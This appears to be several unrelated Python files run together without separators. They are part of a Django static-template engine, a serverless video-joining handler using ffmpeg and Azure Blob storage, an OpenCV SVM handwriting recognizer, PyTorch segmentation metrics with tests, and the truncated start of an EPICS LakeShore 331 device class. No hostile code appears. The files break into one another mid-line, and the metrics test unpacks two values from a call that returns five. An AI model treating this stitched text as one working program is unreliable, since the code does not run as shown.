'builtins': ['render_static.templatetags.render_static'] }, }] class TemplateConfig: """ Container for template specific configuration parameters. :param name: The name of the template :param dest: The absolute destination directory where the template will be written. May be None which indicates the template will be written to its owning app's static directory if it was loaded with an app directory loader :param context: A specific dictionary context to use for this template, may also be an import string to a callable or a callable that generates a dictionary. This may override global context parameters. :raises ImproperlyConfigured: If there are any unexpected or misconfigured parameters """ context_: Dict = {} dest_: Optional[Path] = None def __init__( self, name: str, dest: Optional[Union[Path, str]] = None, context: Optional[Union[Dict, Callable, str]] = None ) -> None: self.name = name if dest is not None: if not isinstance(dest, (str, Path)): raise ImproperlyConfigured( f"Template {name} 'dest' parameter in STATIC_TEMPLATES must be a string or " f"path-like object, not {type(dest)}" ) self.dest_ = Path(dest) if not self.dest_.is_absolute(): raise ImproperlyConfigured( f'In STATIC_TEMPLATES, template {name} dest must be absolute!' ) context = _resolve_context(context, template=name) if context: self.context_ = context @property def context(self) -> Dict: """ The context specific to this template. This will not include global parameters only the context as specified in the template configuration. """ return self.context_ @property def dest(self) -> Optional[Path]: """ The location this template should be saved to, if specified. """ return self.dest_ def __init__(self, config: Optional[Dict] = None) -> None: if config: self.config_ = config @cached_property def config(self) -> dict: """ Lazy configuration property. Fetch the ``STATIC_TEMPLATES`` configuration dictionary which will either be the configuration passed in on initialization or the config specified in the ``STATIC_TEMPLATES`` setting. :return: The ``STATIC_TEMPLATES`` configuration this engine has initialized from :raises ImproperlyConfigured: If there are any terminal errors with the configurations """ if not self.config_: if not hasattr(settings, 'STATIC_TEMPLATES'): raise ImproperlyConfigured( 'No STATIC_TEMPLATES configuration directive in settings!' ) self.config_ = settings.STATIC_TEMPLATES if settings.STATIC_TEMPLATES is not None else { } unrecognized_keys = [ key for key in self.config_.keys() if key not in ['ENGINES', 'templates', 'context'] ] if unrecognized_keys: raise ImproperlyConfigured( f'Unrecognized STATIC_TEMPLATES configuration directives: {unrecognized_keys}' ) return self.config_ @cached_property def context(self) -> dict: """ Lazy context property. Fetch the global context that will be fed to all templates. This includes the settings object and anything listed in the context dictionary in the ``STATIC_TEMPLATES`` configuration. :return: A dictionary containing the global template context :raises ImproperlyConfigured: If the template context is specified and is not a dictionary. """ return { 'settings': settings, **_resolve_context(self.config.get('context', {})) } @cached_property def templates(self) -> dict: """ Lazy template property Fetch the dictionary mapping template names to TemplateConfig objects initializing them if necessary. :return: A dictionary mapping template names to configurations :raise ImproperlyConfigured: If there are any configuration issues with the templates """ try: templates = { name: StaticTemplateEngine.TemplateConfig(name=name, **config) for name, config in self.config.get('templates', {}).items() } except ImproperlyConfigured: raise except Exception as exp: raise ImproperlyConfigured(f"Invalid 'templates' in STATIC_TEMPLATE: {exp}!") from exp return templates @cached_property def engines(self) -> dict: """ Lazy engines property. Fetch the dictionary of engine names to engine instances based on the configuration, initializing said entities if necessary. :return: A dictionary mapping engine names to instances :raise ImproperlyConfigured: If there are configuration problems with the engine backends. """ engine_defs = self.config.get('ENGINES', None) if engine_defs is None: self.config['ENGINES'] = self.DEFAULT_ENGINE_CONFIG elif not hasattr(engine_defs, '__iter__'): raise ImproperlyConfigured( f'ENGINES in STATIC_TEMPLATES setting must be an iterable containing engine ' f'configurations! Encountered: {type(engine_defs)}' ) engines = {} backend_names = [] for backend in self.config.get('ENGINES', []): try: # This will raise an exception if 'BACKEND' doesn't exist or # isn't a string containing at least one dot. default_name = backend['BACKEND'].rsplit('.', 2)[-1] except Exception as exp: invalid_backend = backend.get('BACKEND', '<not defined>') raise ImproperlyConfigured( f'Invalid BACKEND for a static template engine: {invalid_backend}. Check ' f'your STATIC_TEMPLATES setting.' ) from exp # set defaults backend = { 'NAME': default_name, 'DIRS': [], 'APP_DIRS': False, 'OPTIONS': {}, **backend, } engines[backend['NAME']] = backend backend_names.append(backend['NAME']) counts = Counter(backend_names) duplicates = [alias for alias, count in counts.most_common() if count > 1] if duplicates: raise ImproperlyConfigured( f"Template engine aliases are not unique, duplicates: {', '.join(duplicates)}. " f"Set a unique NAME for each engine in settings.STATIC_TEMPLATES." ) for alias, config in engines.items(): params = config.copy() backend = params.pop('BACKEND') engines[alias] = import_string(backend)(params) return engines def __getitem__(self, alias: str) -> Union[StaticDjangoTemplates, StaticJinja2Templates]: """ Accessor for backend instances indexed by name. :param alias: The name of the backend to fetch :return: The backend instance :raises InvalidTemplateEngineError: If a backend of the given alias does not exist """ try: return self.engines[alias] except KeyError as key_error: raise InvalidTemplateEngineError( f"Could not find config for '{alias}' " f"in settings.STATIC_TEMPLATES" ) from key_error def __iter__(self): """ Iterate through the backends. """ return iter(self.engines) def all(self) -> List[Union[StaticDjangoTemplates, StaticJinja2Templates]]: """ Get a list of all registered engines in order of precedence. :return: A list of engine instances in order of precedence """ return [self[alias] for alias in self] @staticmethod def resolve_destination( config: TemplateConfig, template: Union[Jinja2Template, DjangoTemplate], batch: bool, dest: Optional[Union[str, Path]] = None ) -> Path: """ Resolve the destination for a template, given all present configuration parameters for it and arguments passed in. :param config: The template configuration :param template: The template object created by the backend, could be a Jinja2 or Django template :param batch: True if this is part of a batch render, false otherwise :param dest: The destination passed in from the command line :return: An absolute destination path :raises ImproperlyConfigured: if a render destination cannot be determined """ app = getattr(template.origin, 'app', None) if dest is None: dest = config.dest if dest is None: if app: dest = Path(app.path) / 'static' else: try: dest = Path(settings.STATIC_ROOT) except (AttributeError, TypeError) as err: raise ImproperlyConfigured( f"Template {template.template.name} must either be configured with a 'dest'" f"or STATIC_ROOT must be defined in settings, because it was not loaded " f"from an app!" ) from err dest /= template.template.name elif batch or Path(dest).is_dir(): dest /= template.template.name os.makedirs(str(Path(dest if dest else '').parent), exist_ok=True) return Path(dest if dest else '') def render_to_disk( # pylint: disable=R0913 self, selector: str, context: Optional[Dict] = None, dest: Optional[Union[str, Path]] = None, first_engine: bool = False, first_loader: bool = False, first_preference: bool = False ) -> List[Render]: """ Wrap render_each generator function and return the whole list of rendered templates for the given selector. :param selector: The name of the template to render to disk :param context: Additional context parameters that will override configured context parameters :param dest: Override the configured path to render the template at this path, either a string path, or Path like object. If the selector resolves to multiple templates, dest will be considered a directory. If the the selector resolves to a single template, dest will be considered the final file path, unless it already exists as a directory. :param first_engine: If true, render only the set of template names that match the selector that are found by the first rendering engine. By default (False) any templates that match the selector from any engine will be rendered. :param first_loader: If True, render only the set of template names from the first loader that matches any part of the selector. By default (False) any template name that matches the selector from any loader will be rendered. :param first_preference: If true, render only the templates that match the first preference for each loader. When combined with first_loader will render only the first preference(s) of the first loader. Preferences are loader specific and documented on the loader. :return: Render object for all the template(s) rendered to disk :raises TemplateDoesNotExist: if no template by the given name is found :raises ImproperlyConfigured: if not enough information was given to render and write the template """ return [ # pylint: disable=R1721 render for render in self.render_each( selector, context=context, dest=dest, first_engine=first_engine, first_loader=first_loader, first_preference=first_preference ) ] def render_each( # pylint: disable=R0914 self, *selectors: str, context: Optional[Dict] = None, dest: Optional[Union[str, Path]] = None, first_engine: bool = False, first_loader: bool = False, first_preference: bool = False ) -> Generator[Render, None, None]: """ A generator function that renders all selected templates of the highest precedence for each matching template name to disk. The location of the directory of the rendered template will either be based on the `dest` configuration parameter for the template or the app the template was found in. :param selectors: The name(s) of the template(s) to render to disk :param context: Additional context parameters that will override configured context parameters :param dest: Override the configured path to render the template at this path, either a string path, or Path like object. If the selector(s) resolve to multiple templates, dest will be considered a directory. If the the selector(s) resolve to a single template, dest will be considered the final file path, unless it already exists as a directory. :param first_engine: If true, render only the set of template names that match the selector that are found by the first rendering engine. By default (False) any templates that match the selector from any engine will be rendered. :param first_loader: If True, render only the set of template names from the first loader that matches any part of the selector. By default (False) any template name that matches the selector from any loader will be rendered. :param first_preference: If true, render only the templates that match the first preference for each loader. When combined with first_loader will render only the first preference(s) of the first loader. Preferences are loader specific and documented on the loader. :yield: Render objects for each template to disk :raises TemplateDoesNotExist: if no template by the given name is found :raises ImproperlyConfigured: if not enough information was given to render and write the template """ if context: context = resolve_context(context) renders = [] # all jobs are considered part of a batch if dest is provided and more than one selector # is provided batch = len(selectors) > 1 and dest for selector in selectors: config = self.templates.get( selector, StaticTemplateEngine.TemplateConfig(name=selector) ) templates: Dict[str, Union[DjangoTemplate, Jinja2Template]] = {} chain = [] for engine in self.all(): try: for template_name in engine.select_templates( selector, first_loader=first_loader, first_preference=first_preference ): try: templates.setdefault(template_name, engine.get_template(template_name)) except TemplateDoesNotExist as tdne: # pragma: no cover # this should be impossible w/o a loader bug! if len(templates): raise RuntimeError( f'Selector resolved to template {template_name} which is ' f'not loadable: {tdne}' ) from tdne if first_engine and templates: break except TemplateDoesNotExist as tdne: chain.append(tdne) continue if not templates: raise TemplateDoesNotExist(selector, chain=chain) for name, template in templates.items(): # pylint: disable=W0612 renders.append( Render( selector=selector, config=config, template=template, destination=self.resolve_destination( config, template, # each selector is a batch if it resolves to more than one template bool(batch or len(templates) > 1), dest ) ) ) for render in renders: ctx = render.config.context.copy() if context is not None: ctx.update(context) with open(str(render.destination), 'w', encoding='UTF-8') as temp_out: temp_out.write( render.template.render({ **self.context, **ctx }) ) yield render
try: import unzip_requirements except ImportError: pass import asyncio from asyncio.subprocess import PIPE from asyncio import create_subprocess_exec import json, os, sys, subprocess from time import monotonic from functools import wraps from tempfile import mkdtemp from azure.storage.blob import BlobServiceClient from contextlib import contextmanager import websockets as ws import subprocess import aiohttp import shutil import os import uuid r = lambda p: os.path.join(dirname, *p.split("/")) dirname = os.path.abspath(os.path.dirname(__file__)) bin_path = r("res/bin") sw_path = r("res/bin/streetwarp") blob_connection_env = "AZURE_STORAGE_CONNECTION_STRING" blob_service_client = ( BlobServiceClient.from_connection_string(os.getenv(blob_connection_env)) if blob_connection_env in os.environ else None ) ld_path = os.path.join(sw_path, "path_optimizer", "dist", "lib64") if "LD_LIBRARY_PATH" in os.environ: os.environ["LD_LIBRARY_PATH"] += os.path.pathsep + ld_path else: os.environ["LD_LIBRARY_PATH"] = ld_path # Define decorator that lets us @timer('msg') on functions def timer(msg): @contextmanager def wrapper(): start = monotonic() yield print(f"{msg}: {(monotonic()-start)*1000:.3f}ms") def with_func(func): if asyncio.iscoroutinefunction(func): @wraps(func) async def t_async(*args, **kwargs): with wrapper(): try: return await func(*args, **kwargs) except Exception as e: print(f"{msg} failed with {str(e)}.", file=sys.stderr) raise e return t_async else: @wraps(func) def t(*args, **kwargs): with wrapper(): try: return func(*args, **kwargs) except Exception as e: print(f"{msg} failed with {str(e)}.", file=sys.stderr) raise e return t return with_func @timer("prepare input") def prepare_input(key, contents, extension): os.environ["PATH"] += os.pathsep + bin_path os.environ["PATH"] += os.pathsep + sw_path dest = mkdtemp() inp = os.path.join(dest, f"{key}.{extension}") with open(inp, "w") as f: f.write(contents) return inp # https://stackoverflow.com/a/53323746 async def _read_stream(stream, callback): while True: line = await stream.readline() if line: callback(line.decode("utf-8").strip()) else: break async def run(command, args, out_callback, err_callback): process = await create_subprocess_exec( command, *args, stdout=PIPE, stderr=PIPE, limit=1000 * 1000 * 10 # 10 MB ) await asyncio.wait( [ _read_stream(process.stdout, out_callback), _read_stream(process.stderr, err_callback), ] ) return await process.wait() @timer("prepare output") def prepare_output(key): out_dir = mkdtemp() out_name = os.path.join(out_dir, f"{key}.mp4") return (out_dir, out_name) @timer("prepare output with EFS") def prepare_output_efs(key): efs_id = str(uuid.uuid4())[:13] out_dir = os.path.join("/mnt/efs/", efs_id) os.mkdir(out_dir) out_name = os.path.join(out_dir, f"{key}.mp4") return (out_dir, out_name) @timer("connect to progress endpoint") async def connect_progress(endpoint): socket = None try: socket = await ws.connect(endpoint) print(f"Connected to server {endpoint}") except Exception as e: print(f"Could not connect websocket: {str(e)}") return socket @timer("joining videos") async def join_videos(event): callback_endpoint = event["callbackEndpoint"] video_urls = event["videoUrls"] key = event["key"] out_dir, out_name = prepare_output_efs(key) socket = await connect_progress(callback_endpoint) async def progress(msg): if socket is not None: wrapper = {"payload": msg, "key": key} await socket.send(json.dumps(wrapper)) def short_progress(msg): asyncio.get_event_loop().create_task( progress({"type": "PROGRESS_STAGE", "stage": msg}) ) @timer("downloading videos") async def download_videos(): @timer("fetching file") async def fetch(session, url): async with session.get(url, timeout=60) as response: res = await response.read() name = os.path.join(out_dir, url.rsplit("/", 1)[-1]) with open(name, "wb") as f: f.write(res) print(f"{url} downloaded to {name}") return name async with aiohttp.ClientSession() as session: return await asyncio.gather( *[ fetch( session, url, ) for url in video_urls ] ) @timer("concat videos with ffmpeg") def concat_videos(video_files): # https://stackoverflow.com/questions/7333232/how-to-concatenate-two-mp4-files-using-ffmpeg flist = os.path.join(out_dir, "file_list.txt") last_vid = video_files[0] index = 1 for v in video_files[1:]: with open(flist, "w") as f: f.writelines([f"file '{v}'\n" for v in [last_vid, v]]) new_vid = os.path.join(out_dir, f"fold_{index}.mp4") args = [ r("res/bin/ffmpeg"), "-f", "concat", "-safe", "0", "-i", flist, "-c", "copy", new_vid, ] print(f"args: {' '.join(args)}") subprocess.check_call(args) os.remove(last_vid) os.remove(v) last_vid = new_vid index += 1 os.rename(last_vid, out_name) @timer("upload result") async def upload_vid(): if blob_service_client is not None: name = f"{key}.mp4" client = blob_service_client.get_container_client("output").get_blob_client( f"{key}.mp4" ) with open(out_name, "rb") as mp4: client.upload_blob(mp4) return client.url try: short_progress("Downloading video segments") video_files = await download_videos() short_progress("Joining video segments") concat_videos(video_files) result = {} if blob_service_client is not None: url = await upload_vid() print(f"Upload location: {url}") result["videoResult"] = {"url": url} return {"statusCode": 200, "body": json.dumps(result)} except Exception as e: return {"statusCode": 500, "body": json.dumps({"error": str(e)})} finally: if socket is not None: await socket.close() shutil.rmtree(out_dir) async def main_async(event): if "joinVideos" in event and event["joinVideos"]: return await join_videos(event) key = event["key"] index = None if "index" not in event else event["index"] args = event["args"] use_optimizer = event["useOptimizer"] extension = event["extension"] contents = event["contents"] callback_endpoint = event["callbackEndpoint"] in_file = prepare_input(key, contents, extension) out_dir, out_name = prepare_output(key) args += ["--output-dir", out_dir, "--output", out_name, in_file] if use_optimizer: args += ["--optimizer", os.path.join(sw_path, "path_optimizer", "main.py")] socket = await connect_progress(callback_endpoint) async def progress(msg): if socket is not None: wrapper = {"payload": msg, "key": key, "index": index} await socket.send(json.dumps(wrapper)) @timer("upload video") def upload_vid(client): with open(out_name, "rb") as mp4: client.upload_blob(mp4) @timer("run streetwarp") async def streetwarp(): stderr = [] result = [] def on_out(line): try: msg = json.loads(line) if "type" in msg and msg["type"] in ("PROGRESS", "PROGRESS_STAGE"): print(f"streetwarp progress: {line}") asyncio.get_event_loop().create_task(progress(msg)) else: result.append(msg) except Exception as e: print(f"Could not parse streetwarp output {line}", file=sys.stderr) print(f"Error: {str(e)}", file=sys.stderr) def on_err(line): print(f"streetwarp err: {line}") stderr.append(line) exit_code = await run("streetwarp", args, on_out, on_err) if exit_code != 0: stderr = "\n".join(stderr) print(f'streetwarp failed (args=[{" ".join(args)}])', file=sys.stderr) print(f"stderr: {stderr}", file=sys.stderr) raise RuntimeError(f"streetwarp failed with exit code {exit_code}") return result[-1] try: metadata = await streetwarp() result = {"metadataResult": metadata} if "--dry-run" not in args and blob_service_client is not None: name = f"{key}.mp4" if index is None else f"seg_{key}_{index}.mp4" client = blob_service_client.get_container_client("output").get_blob_client( name ) upload_vid(client) print(f"Upload location: {client.url}") result["videoResult"] = {"url": client.url} return {"statusCode": 200, "body": json.dumps(result)} except Exception as e: return {"statusCode": 500, "body": json.dumps({"error": str(e)})} finally: if socket is not None: await socket.close() shutil.rmtree(out_dir) @timer("main function") def main(event, _context): return asyncio.get_event_loop().run_until_complete(main_async(event))
<reponame>18970738669/opencv_demo import cv2 import os import json import numpy as np from numpy.linalg import norm SZ = 20 def deskew(img): m = cv2.moments(img) if abs(m['mu02']) < 1e-2: return img.copy() skew = m['mu11'] / m['mu02'] M = np.float32([[1, skew, -0.5 * SZ * skew], [0, 1, 0]]) img = cv2.warpAffine(img, M, (SZ, SZ), flags=cv2.WARP_INVERSE_MAP | cv2.INTER_LINEAR) return img def preprocess_hog(digits): samples = [] for img in digits: gx = cv2.Sobel(img, cv2.CV_32F, 1, 0) gy = cv2.Sobel(img, cv2.CV_32F, 0, 1) mag, ang = cv2.cartToPolar(gx, gy) bin_n = 16 bin = np.int32(bin_n * ang / (2 * np.pi)) bin_cells = bin[:10, :10], bin[10:, :10], bin[:10, 10:], bin[10:, 10:] mag_cells = mag[:10, :10], mag[10:, :10], mag[:10, 10:], mag[10:, 10:] hists = [np.bincount(b.ravel(), m.ravel(), bin_n) for b, m in zip(bin_cells, mag_cells)] hist = np.hstack(hists) eps = 1e-7 hist /= hist.sum() + eps hist = np.sqrt(hist) hist /= norm(hist) + eps samples.append(hist) return np.float32(samples) class StatModel(object): def load(self, fn): self.model = self.model.load(fn) def save(self, fn): self.model.save(fn) class SVM(StatModel): def __init__(self, C=1, gamma=0.5): self.model = cv2.ml.SVM_create() self.model.setGamma(gamma) self.model.setC(C) self.model.setKernel(cv2.ml.SVM_RBF) self.model.setType(cv2.ml.SVM_C_SVC) # 训练svm def train(self, samples, responses): self.model.train(samples, cv2.ml.ROW_SAMPLE, responses) # 字符识别 def predict(self, samples): r = self.model.predict(samples) return r[1].ravel() class CardPredictor: def __del__(self): self.save_traindata() def train_svm(self): # 识别英文字母和数字 self.modelshouxie = SVM(C=1, gamma=0.5) if os.path.exists("svmshouxie.dat"): self.modelshouxie.load("svmshouxie.dat") else: chars_train = [] chars_label = [] for root, dirs, files in os.walk("/home/python/Desktop/opencv_test/opencv_test1/train_shouxie/Validation"): if len(os.path.basename(root)) > 1: continue root_int = ord(os.path.basename(root)) print("-" * 20) print(os.path.basename(root)) for filename in files: if filename == ".DS_Store": continue print(filename) filepath = os.path.join(root, filename) digit_img = cv2.imread(filepath) digit_img = cv2.cvtColor(digit_img, cv2.COLOR_BGR2GRAY) chars_train.append(digit_img) # chars_label.append(1) chars_label.append(root_int) chars_train = list(map(deskew, chars_train)) chars_train = preprocess_hog(chars_train) # chars_train = chars_train.reshape(-1, 20, 20).astype(np.float32) chars_label = np.array(chars_label) print(chars_train.shape) self.modelshouxie.train(chars_train, chars_label) def save_traindata(self): if not os.path.exists("svmshouxie.dat"): self.modelshouxie.save("svmshouxie.dat") if __name__ == '__main__': c = CardPredictor() c.train_svm() part_card = cv2.imread("/home/python/Desktop/opencv_test/opencv_test1/qiegezifu1_3.jpg") w = abs(part_card.shape[1] - SZ) // 2 part_card = cv2.copyMakeBorder(part_card, 0, 0, w, w, cv2.BORDER_CONSTANT, value=[0, 0, 0]) part_card = cv2.resize(part_card, (SZ, SZ), interpolation=cv2.INTER_AREA) part_card = preprocess_hog([part_card]) resp = c.modelshouxie.predict(part_card) print(chr(resp[0])) # img = cv2.imread("/home/python/Desktop/opencv_test/samoye1.jpg") # cv2.imshow("img", img) # cv2.waitKey(0)
import torch import torch.nn as nn import numpy as np # NYU14_name_list = ['Unknown', 'Bed', 'Books', 'Ceiling', 'Chair', # 'Floor', 'Furniture', 'Objects', 'Picture', # 'Sofa', 'Table', 'TV', 'Wall', 'Window' # ] # Label11_name_list = ["None", "Ceiling", "Floor", "Wall", "Window", # "Chair", "Bed", "Sofa", "Desk","TV","Furniture","Objects"] class Metric_IoU_base(nn.Module): """ Given two [n,class] tensors, calculating per class IoU and average IoU """ def __init__(self): super().__init__() self.epsilon = 1e-6 self.register_buffer('output', torch.ones([], requires_grad=False)) self.register_buffer('intersections', torch.ones([], requires_grad=False)) self.register_buffer('unions', torch.ones([], requires_grad=False)) # self.register_buffer('valid', torch.ones([], requires_grad=False)) def __call__(self, pred, gt): class_num = pred.size(-1) self.output = torch.ones([]) self.valid = torch.ones([]) self.intersections = torch.zeros([class_num]) self.unions = torch.zeros([class_num]) self.output = torch.zeros([class_num]) # self.valid = torch.zeros([class_num]) for class_n in range(class_num): pred_c = pred[:, class_n].flatten() gt_c = gt[:, class_n].flatten() intersection = (pred_c & gt_c).float().sum() # if one of them is 0: 0 union = (pred_c | gt_c).float().sum() # if both 0: 0 iou = (intersection+self.epsilon)/(union+self.epsilon) iou = iou.unsqueeze(-1) intersection = intersection.unsqueeze(-1) union = union.unsqueeze(-1) # valid = gt_c.sum() > 0 # valid = valid.unsqueeze(-1) self.intersections[class_n] = intersection self.unions[class_n] = union self.output[class_n] = iou # self.valid[class_n] = valid return self.output, self.intersections, self.unions#, self.valid class Metric_PR_Base(nn.Module): """ Given two [n,class] tensors, calculating per class accuracy """ def __init__(self): super().__init__() self.epsilon = 1e-6 self.register_buffer('precisions', torch.ones([], requires_grad=False)) self.register_buffer('recalls', torch.ones([], requires_grad=False)) # self.register_buffer('valid', torch.ones([], requires_grad=False)) self.register_buffer('intersection', torch.ones([], requires_grad=False)) self.register_buffer('gt_sum', torch.ones([], requires_grad=False)) self.register_buffer('pred_sum', torch.ones([], requires_grad=False)) def __call__(self, pred, gt): class_num = pred.size(-1) self.precisions = torch.zeros([class_num]) self.recalls = torch.zeros([class_num]) # self.valid = torch.zeros([class_num]) self.intersection = torch.zeros([class_num]) self.gt_sum = torch.zeros([class_num]) self.pred_sum = torch.zeros([class_num]) for class_n in range(class_num): pred_c = pred[:, class_n].flatten() gt_c = gt[:, class_n].flatten() intersection = (pred_c & gt_c).float().sum() # if one of them is 0: 0 gt_sum = gt_c.sum() pred_sum = pred_c.sum() r = (intersection+self.epsilon)/(gt_sum+self.epsilon) p = (intersection+self.epsilon)/(pred_sum+self.epsilon) r= r.unsqueeze(-1) p= p.unsqueeze(-1) # valid = gt_c.sum() > 0 # valid = valid.unsqueeze(-1) self.precisions[class_n] = p self.recalls[class_n] = r # self.valid[class_n] = valid self.intersection[class_n] += intersection.cpu() self.gt_sum[class_n] += gt_sum.cpu() self.pred_sum[class_n] += pred_sum.cpu() return self.precisions, self.recalls, self.intersection, \ self.gt_sum, self.pred_sum class Metric_IoU(nn.Module): def __init__(self): super().__init__() self.iou = Metric_IoU_base() def __call__(self, pred_, gt_, class_num, mask_=None): """ Parameters ---------- pred_ : TYPE Shape=[batch, class, ...] gt_ : TYPE Shape=[batch, ...] class_num : TYPE Number of classes mask_ : TYPE, optional Shape=[batch, ...]. Larger than 0 are the region to be masked Returns ------- IoU, Intersections, Unions, Valid """ volume = torch.argmax(pred_, dim=1) volume = volume.clamp(0, class_num-1) gt = gt_.clamp(0, class_num-1) if mask_ is not None: volume = volume[mask_ == 0] gt = gt[mask_ == 0] # print('arg\n', volume) volume = torch.nn.functional.one_hot(volume, class_num).view(-1,class_num) # print('onehot volume\n', volume) gt = torch.nn.functional.one_hot(gt,class_num).view(-1,class_num) # print('onehot gt\n', gt) return self.iou(volume,gt) class Metric_PR(nn.Module): def __init__(self): super().__init__() self.acc = Metric_PR_Base() def __call__(self, pred_, gt_, class_num, mask_=None): """ Parameters ---------- pred_ : TYPE Shape=[batch, class, ...] gt_ : TYPE Shape=[batch, ...] class_num : TYPE Number of classes mask_ : TYPE, optional Shape=[batch, ...]. Larger than 0 are the region to be masked Returns ------- Accuracy, Recall, Valid """ volume = torch.argmax(pred_, dim=1) volume = volume.clamp(0, class_num-1) gt = gt_.clamp(0, class_num-1) if mask_ is not None: volume = volume[mask_ == 0] gt = gt[mask_ == 0] volume = torch.nn.functional.one_hot(volume, class_num).view(-1,class_num) gt = torch.nn.functional.one_hot(gt,class_num).view(-1,class_num) return self.acc(volume,gt) def Metric_F1(precision, recall): return 2 * precision * recall / (precision + recall) def test_basic(): batch=1 class_num=3 volume_pred = torch.rand(batch,class_num,1,1,2) full_gt = torch.randint(0, class_num,size=(batch,1,1,2)) volume_pred = torch.FloatTensor([[0.1,0.1,0.7],[1,0,0], [0.2,0.8,0.0], [0,0,1], [0,1,0]]) #2,0,1,2,1 full_gt = torch.LongTensor([[2],[1],[2],[1],[1]]) print('volume_pred', volume_pred) print('gt', full_gt) # Semantic print("semantic: ") iou_ = Metric_IoU() acc_ = Metric_PR() iou, inters, unions = iou_(volume_pred, full_gt,class_num = class_num) print('expect intersections: [0, 1, 1], got', inters,'mean',inters.mean()) print('expect unions: [1, 4, 3], got', unions,'mean',unions.mean()) print('expect IoU: [0, 0.25, 0.33], got', iou,'mean',iou.mean()) acc, recall = acc_(volume_pred, full_gt,class_num = class_num) print('expect Accuracy: [0, 0.33, 0.5], got', acc,'mean',acc.mean()) print('expect Recall: [0, 0.5, 0.5], got', recall,'mean',recall.mean()) # Completion print("completion: ") iou_ = Metric_IoU() acc_ = Metric_PR() iou, inters, unions = iou_(volume_pred, full_gt,class_num = 2) print('expect intersections: [0, 4], got', inters, 'mean',inters.mean()) print('expect unions: [1, 5], got', unions,'mean',unions.mean()) print('expect IoU: [0, 0.8], got', iou,'mean',iou.mean()) acc, recall = acc_(volume_pred, full_gt,class_num = 2) print('expect Accuracy: [0, 0.8], got', acc,'mean',acc.mean()) print('expect Recall: [0, 0.8], got', recall,'mean',recall.mean()) print('recall mean: ', recall.mean()) def test(): from torch.utils.data import DataLoader from dataset_volume import Dataset from config import Config config = Config('../config.yml.example') config.BATCH_SIZE=1 train_dataset = Dataset(config, '../example_data/train', '../example_data/gt','../example_data/mask') train_loader = DataLoader( dataset=train_dataset, batch_size=config.BATCH_SIZE, num_workers=1, drop_last=True, shuffle=False ) iou_ = Metric_IoU() acc_ = Metric_PR() for items in train_loader: volume,gt,mask = items # name = items # gt = torch.from_numpy(gt) gt2 = torch.nn.functional.one_hot(gt,14).view(-1,14) for i in range(14): print(gt2[:,i].sum().item()) volume_pred = torch.rand(config.BATCH_SIZE, config.CLASS_NUM,config.DATA_DIMS[0],config.DATA_DIMS[1], config.DATA_DIMS[2]) # Semantic iou, inter, union= iou_(volume_pred,gt, config.CLASS_NUM) acc, recall, inter2, gt_sum, pred_sum = acc_(volume_pred, gt,config.CLASS_NUM) print("Semantic") print("iou:",iou, "mean", iou.mean()) print("inter:",inter, "mean", inter.mean()) print("union:", union, "mean", union.mean()) print("acc:",acc, "acc", acc.mean()) print("recall:",recall, "mean", recall.mean()) # Completion iou, inter, union= iou_(volume_pred,gt, 2) acc, recall, inter, gt_sum, pred_sum = acc_(volume_pred, gt, 2) print("Completion") print("iou:",iou, "mean", iou.mean()) print("inter:",inter, "mean", inter.mean()) print("union:", union, "mean", union.mean()) print("acc:",acc, "acc", acc.mean()) print("recall:",recall, "mean", recall.mean()) print('\n\n') break if __name__ == "__main__": test()
<filename>py4syn/epics/LakeShore331Class.py """LakeShore 331 Class Python Class for EPICS LakeShore 331 :platform: Unix :synopsis: Python Class for EPICS LakeShore 331 .. moduleauthor:: <NAME> <<EMAIL>> .. note:: 06/07/2015 [douglas.beniz] first version released """ from epics import Device from enum import Enum from time import sleep from py4syn.epics.IScannable import IScannable from py4syn.epics.StandardDevice import StandardDevice class LakeShore_t(Enum): """ Enumeration of LakeShore channels. """ Channel_A = 0 # channel A Channel_B = 1 # channel B class ControoLoopMode_t(Enum): """ Enumeration of Control Loop Modes. """ CLM_Manual_PID = 1 CLM_Zone = 2 CLM_OpenLoop = 3 CLM_AutoTune_PID = 4 CLM_AutoTune_PI = 5 CLM_AutoTune_P = 6 class LakeShore331 (IScannable, StandardDevice): """ Python class to help configuration and control of LakeShore 331 devices via Hyppie over EPICS. Examples -------- >>> from py4syn.epics.LakeShore331 import LakeShore331 >>> ls331 = LakeShore331("DXAS:LS331", "ls331", channel=0) # Use 1 for Ch B >>> ls331.setValue(120) # 120 degrees Celsius """ def __init__ (self, pvPrefix="", mnemonic="", channel=0): """ **Constructor** See :class:`py4syn.epics.StandardDevice` Parameters ---------- pvPrefix : `string` LakeShore331's device base naming of the PV (Process Variable); Like DXAS:LS331; mnemonic : `string` LakeShore331's mnemonic """ StandardDevice.__init__(self, mnemonic) self.lakeshore331 = Device(pvPrefix+':', ('GetHEAT', 'GetHeaterRange', 'GetAPIDD', 'GetAPIDI', 'GetAPIDP', 'GetASetPoint', 'GetBPIDD', 'GetBPIDI', 'GetBPIDP', 'GetBSetPoint', 'GetCTempA', 'GetCTempB', 'GetKTempA', 'GetKTempB', 'SetHeaterRange', 'SetAPIDD', 'SetAPIDI', 'SetAPIDP', 'SetASetPoint', 'SetBPIDD', 'SetBPIDI', 'SetBPIDP', 'SetBSetPoint', 'GetCmode', 'SetCmode')) self.ls331_control = Device(pvPrefix + ':CONTROL:', ['SetAPID', 'SetBPID', 'Trigger']) if (channel == 1): self.ls331_channel = LakeShore_t.Channel_B else: # Default self.ls331_channel = LakeShore_t.Channel_A def getHeat(self): """ Heater output query Returns ------- Value: Float, e.g.: 0.001 Examples -------- >>> ls331.getHeat() >>> 51.530 """ return self.lakeshore331.get('GetHEAT') def getHeaterRange(self): """ Heater range command. Returns ------- Value: Float, e.g.: 0.001 Examples -------- >>> ls331.getHeaterRange() >>> 51.530 """ return self.lakeshore331.get('GetHeaterRange') def getAPIDD(self): """ Returns Value D of PID for channel A. Returns ------- Value: Integer, e.g.: 10 Examples -------- >>> ls331.getAPIDD() >>> 31 """ return self.lakeshore331.get('GetAPIDD') def getBPIDD(self): """ Returns Value D of PID for channel B. Returns ------- Value: Integer, e.g.: 10 Examples -------- >>> ls331.getBPIDD() >>> 32 """ return self.lakeshore331.get('GetBPIDD') def getAPIDI(self): """ Returns Value I of PID for channel A. Returns ------- Value: Integer, e.g.: 10 Examples -------- >>> ls331.getAPIDI() >>> 31 """ return self.lakeshore331.get('GetAPIDI') def getBPIDI(self): """ Returns Value I of PID for channel B. Returns ------- Value: Integer, e.g.: 10 Examples -------- >>> ls331.getBPIDI() >>> 32 """ return self.lakeshore331.get('GetBPIDI') def getAPIDP(self): """ Returns Value P of PID for channel A. Returns ------- Value: Integer, e.g.: 10 Examples -------- >>> ls331.getAPIDP() >>> 31 """ return 